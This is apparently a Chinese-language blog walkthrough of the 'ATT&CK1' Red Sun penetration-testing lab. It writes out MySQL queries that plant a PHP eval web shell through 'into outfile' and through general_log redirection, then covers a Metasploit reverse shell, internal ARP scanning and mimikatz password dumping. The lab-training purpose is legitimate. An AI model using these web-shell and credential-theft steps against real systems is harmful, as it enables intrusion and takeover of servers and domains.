attck1

红日系列靶场attck1

在这里插入图片描述

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
攻击者:
kali
172.17.137.93

windows
172.17.137.87

靶场:
VM1:对外边界服务器,win7
192.168.52.143
172.17.137.105

VM2:域成员,2003
192.168.52.141

VM3:域控,2008
192.168.52.138

image-20231127164203012

访问80端口 是一个PHP探针

image-20231127164251109

mysql数据库有弱密码 root root可以连接

由于是phpstudy创建的网站 一般会有phpmyadmin

image-20231127171656942

进入尝试写入shell

方案一:直接写入shell

执行查询语句

1
show global variables like '%secure%'

放secure_file_priv的值为空时可以直接写入shell

1
select '<?php @eval($_POST["re"])?>' into outfile 'C:/phpstudy/WWW/shell2.php'

image-20231127172038224

这边的值不为空(NULL不为空)(这意味着MySQL服务器不允许在安全文件目录之外的任何位置进行文件操作) 且secure_auth(安全文件目录)是不存在的 也就是全局禁止文件操作

解决方案(https://www.dbs724.com/224656.html)这个更改就需要整个计算机的权限

方案二:日志写入shell

1
show variables like '%general%'

查看是否开启全局日志记录

image-20231127173220349

没有开启时可以通过开启并更改日志路径和日志文件为php文件。通过日志记录一句话木马来利用。

开启命令:

1
set global general_log=ON

更改路径命令为:

1
set global general_log_file='C:/phpstudy/WWW/c'

(phpstudy路径?探针里面写的明明白白了)

image-20231127173556443

执行成功可以发现全局日志打开 并且日志文件更改为我们设置的shell文件

此时我们查询的语句会被记录到日志文件中

1
select '<?php @eval($_POST["cmd"])?>'

蚁剑开连

systeminfo收集本机信息

image-20231127174203621

上线msf

能出网 反弹shell 添加路由

image-20231127183516316

存在192.168.52.0网段

arp 探测内网存活主机

1
2
3
4
5
6
7
use post/windows/gather/arp_scanner

set RHOSTS 192.168.52.0/24

set SESSION 1

exploit

image-20231127202100584

image-20231127194532845

mimikatz读一下密码

很明显里面存在GOD域控

Penetration
#渗透测试
attck1
http://example.com/2023/12/17/penetration/attck1/
作者
Re1ca1g
发布于
2023年12月17日
许可协议